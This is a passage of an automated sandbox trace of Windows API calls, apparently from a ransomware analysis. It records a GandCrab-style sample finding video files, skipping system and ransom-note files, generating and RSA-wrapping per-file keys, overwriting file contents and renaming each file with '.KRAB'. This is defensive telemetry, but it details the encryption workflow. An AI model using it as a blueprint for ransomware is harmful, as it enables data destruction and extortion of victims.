phProv=0x338f134*=0x1011018) returned 1 [0098.642] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.643] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.643] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.643] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.643] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0098.643] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.643] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10112c0) returned 1 [0098.643] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.644] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.644] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.644] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.644] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0098.644] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.644] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0098.644] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0098.644] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.644] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.645] GetLastError () returned 0x0 [0098.645] CryptDestroyKey (hKey=0xfbd920) returned 1 [0098.645] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0098.645] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.645] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0098.645] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.645] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.645] GetLastError () returned 0x0 [0098.645] CryptDestroyKey (hKey=0xfbd920) returned 1 [0098.645] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.645] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\hFvoPiEIjgGSSo.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\hfvopieijggsso.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.646] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.646] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.646] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x5f44, lpOverlapped=0x0) returned 1 [0098.655] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffa0bc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.655] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5f44, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x5f44, lpOverlapped=0x0) returned 1 [0098.655] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.655] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.670] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.670] CloseHandle (hObject=0x434) returned 1 [0098.815] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.816] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\hFvoPiEIjgGSSo.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\hfvopieijggsso.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\hFvoPiEIjgGSSo.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\hfvopieijggsso.mkv.krab")) returned 1 [0098.836] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.836] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.836] lstrcmpW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2=".") returned 1 [0098.836] lstrcmpW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="..") returned 1 [0098.836] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="Iap8KgCPIUNqJqQqBf5.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Iap8KgCPIUNqJqQqBf5.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Iap8KgCPIUNqJqQqBf5.mkv" [0098.836] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.836] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Iap8KgCPIUNqJqQqBf5.mkv.KRAB") returned 57 [0098.837] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Iap8KgCPIUNqJqQqBf5.mkv") returned 52 [0098.837] lstrlenW (lpString=".mkv") returned 4 [0098.837] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.837] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0098.837] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.837] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Iap8KgCPIUNqJqQqBf5.mkv") returned 52 [0098.837] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Iap8KgCPIUNqJqQqBf5.mkv") returned 52 [0098.837] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="desktop.ini") returned 1 [0098.837] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="autorun.inf") returned 1 [0098.837] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="ntuser.dat") returned -1 [0098.837] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="iconcache.db") returned -1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="bootsect.bak") returned 1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="boot.ini") returned 1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="ntuser.dat.log") returned -1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="thumbs.db") returned -1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="ntldr") returned -1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="NTDETECT.COM") returned -1 [0098.838] lstrcmpiW (lpString1="Iap8KgCPIUNqJqQqBf5.mkv", lpString2="Bootfont.bin") returned 1 [0098.838] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.838] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.839] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.839] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.839] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.839] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.839] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.839] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.840] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.840] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.841] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.841] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.841] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.841] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.841] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.841] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0098.842] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.842] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.842] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.842] GetLastError () returned 0x0 [0098.842] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.842] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0098.842] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011458) returned 1 [0098.843] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0098.843] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.843] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.843] GetLastError () returned 0x0 [0098.843] CryptDestroyKey (hKey=0xfbd920) returned 1 [0098.843] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0098.843] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Iap8KgCPIUNqJqQqBf5.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\iap8kgcpiunqjqqqbf5.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.844] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.844] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.845] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x15433, lpOverlapped=0x0) returned 1 [0098.860] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffeabcd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.860] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15433, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x15433, lpOverlapped=0x0) returned 1 [0098.861] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.861] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.864] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.865] CloseHandle (hObject=0x434) returned 1 [0098.865] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.865] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Iap8KgCPIUNqJqQqBf5.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\iap8kgcpiunqjqqqbf5.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Iap8KgCPIUNqJqQqBf5.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\iap8kgcpiunqjqqqbf5.mkv.krab")) returned 1 [0098.866] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.866] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.866] lstrcmpW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2=".") returned 1 [0098.867] lstrcmpW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="..") returned 1 [0098.867] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="ImEAuC3_z_LZH mv7.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ImEAuC3_z_LZH mv7.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ImEAuC3_z_LZH mv7.flv" [0098.867] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.867] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ImEAuC3_z_LZH mv7.flv.KRAB") returned 55 [0098.867] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ImEAuC3_z_LZH mv7.flv") returned 50 [0098.867] lstrlenW (lpString=".flv") returned 4 [0098.867] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.867] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".flv ") returned 5 [0098.867] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ImEAuC3_z_LZH mv7.flv") returned 50 [0098.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ImEAuC3_z_LZH mv7.flv") returned 50 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="desktop.ini") returned 1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="autorun.inf") returned 1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="ntuser.dat") returned -1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="iconcache.db") returned 1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="bootsect.bak") returned 1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="boot.ini") returned 1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="ntuser.dat.log") returned -1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="thumbs.db") returned -1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="KRAB-DECRYPT.html") returned -1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="ntldr") returned -1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="NTDETECT.COM") returned -1 [0098.868] lstrcmpiW (lpString1="ImEAuC3_z_LZH mv7.flv", lpString2="Bootfont.bin") returned 1 [0098.868] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.869] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0098.869] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.870] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.870] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.870] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.870] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0098.870] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.870] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0098.871] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.871] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.871] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.871] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.871] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0098.871] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.872] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011678) returned 1 [0098.872] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0098.872] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.872] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.873] GetLastError () returned 0x0 [0098.873] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.873] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0098.873] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10111b0) returned 1 [0098.873] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0098.873] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.873] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.874] GetLastError () returned 0x0 [0098.874] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.874] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0098.874] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ImEAuC3_z_LZH mv7.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\imeauc3_z_lzh mv7.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.874] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.875] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.875] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x38e7, lpOverlapped=0x0) returned 1 [0098.957] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffc719, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.957] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x38e7, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x38e7, lpOverlapped=0x0) returned 1 [0098.957] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.957] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.961] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.962] CloseHandle (hObject=0x434) returned 1 [0098.962] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.962] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ImEAuC3_z_LZH mv7.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\imeauc3_z_lzh mv7.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ImEAuC3_z_LZH mv7.flv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\imeauc3_z_lzh mv7.flv.krab")) returned 1 [0098.963] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.963] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.963] lstrcmpW (lpString1="IRpB4BeeLt.mkv", lpString2=".") returned 1 [0098.963] lstrcmpW (lpString1="IRpB4BeeLt.mkv", lpString2="..") returned 1 [0098.963] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="IRpB4BeeLt.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\IRpB4BeeLt.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\IRpB4BeeLt.mkv" [0098.963] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.964] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\IRpB4BeeLt.mkv.KRAB") returned 48 [0098.964] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\IRpB4BeeLt.mkv") returned 43 [0098.964] lstrlenW (lpString=".mkv") returned 4 [0098.964] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.964] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0098.964] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.964] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\IRpB4BeeLt.mkv") returned 43 [0098.964] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\IRpB4BeeLt.mkv") returned 43 [0098.964] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="desktop.ini") returned 1 [0098.964] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="autorun.inf") returned 1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="ntuser.dat") returned -1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="iconcache.db") returned 1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="bootsect.bak") returned 1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="boot.ini") returned 1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="ntuser.dat.log") returned -1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="thumbs.db") returned -1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", 